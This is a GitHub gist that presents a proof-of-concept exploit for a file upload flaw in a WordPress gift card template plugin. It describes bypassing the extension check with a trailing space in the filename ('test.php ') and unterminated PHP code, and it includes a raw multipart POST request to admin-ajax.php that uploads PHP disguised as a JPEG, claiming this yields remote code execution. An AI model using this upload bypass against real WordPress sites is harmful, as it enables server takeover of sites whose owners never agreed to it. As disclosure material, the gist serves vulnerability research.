Skip to content

Instantly share code, notes, and snippets.

Created December 21, 2020 02:57
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save bc0d3/cbc458f0fcbe0f897e529c7f3d77c9d6 to your computer and use it in GitHub Desktop.



Modul: Custom GiftCard Template

POC Description

When the "Custom Gift Card Template" function is found in the option to upload image files, when uploading an image, a space must be added in the name of the extension, remaining as follows (variable filename):

Content-Disposition: form-data; name="file"; filename="test.php "

then in the same payload you have to create a php code that does not end with " ?> " you have to comment " /** ", then the request is sent and the file is uploaded with the name that was given previously.

In the directory where your file is uploaded is:


Then if you have imagination you have the RCE


POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-CL,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1xxxxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 403
DNT: 1
Connection: close

Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: image/jpeg

echo 'Test';

Content-Disposition: form-data; name="action"


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment